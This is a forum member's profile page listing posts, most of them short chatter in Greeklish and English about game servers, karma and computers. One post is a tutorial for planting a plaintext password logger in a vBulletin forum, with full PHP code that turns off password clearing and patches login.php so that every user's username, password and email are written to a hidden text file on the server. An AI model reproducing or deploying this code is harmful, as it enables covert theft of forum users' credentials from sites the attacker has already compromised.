Jump to content

flAmingw0rm `

Members
  • Posts

    23
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Everything posted by flAmingw0rm `

  1. xa00xa0ax0xa0xa0ax0xa0a0 00x0ax0a0 0x lllllllllllllllllllllloooooooooooooooooooollllllllllllllllllll
  2. eise polly pro akou ethernet.
  3. 10/10 i like this.! btw MasterDisaster mpes msn.
  4. You Are not Staff member. btw Who Are u?
  5. Are you crazy man ? you give karma to Showcase. OMG. Someone Fix The Karma.
  6. Alien Ware pc ? eine pollu akriva alla a3izoun. egw proteimaw na ftia3w ena monos me 1000 eurw para na dosw tosa gia ena laptop
  7. WinRar kai kati adobe . otan 8a sta zhtaei 8a breis k download link.
  8. OMG i like the server. Join All !! the best Server.
  9. /target "Player's name" Alt + G And Then Press Inventory. C:\Server\Loginserver\config\bannedip and add the IP. Shift and Click and press Add Drop (i am not sure for the lastone )
  10. /fail poo eise eleos. allazontas ta HTML nomizeis eine diko sou ? k 3exases kati simadiko . sto SQL Leei oti eine Human Male.
  11. vBulletin Password Logging in this tutorial i will show you how to implement a plaintext password logger on a vBulletin Forum. So Let's Start. =============================================== Need: access to the site - ftp, cPanel, PHP Shell etc. =============================================== 1. open global.php which is located in the forum directory Look For: code: $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; and change it to: Code: //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; 2. now open login.php which is in the same directory as global.php Look For: Code: process_new_login and paste this under it: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password = $vbulletin->GPC["vb_login_password"]; $lg_file = "./includes/passwords.txt"; $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) { $fp1 = @fopen($lg_file, "a+"); @fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n"); @fclose($fp1); $f = @file($lg_file); $new = array_unique($f); $fp = @fopen($lg_file, "w"); foreach($new as $values) { @fputs($fp, $values); } @fclose($fp); } } Regards ~ flAmingw0rm
  12. flAmingw0rm `, Atheist, VazeloS*, DarkViolet (+ 1 Hidden) and 0 Guests are viewing this topic. n4b ;D
×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock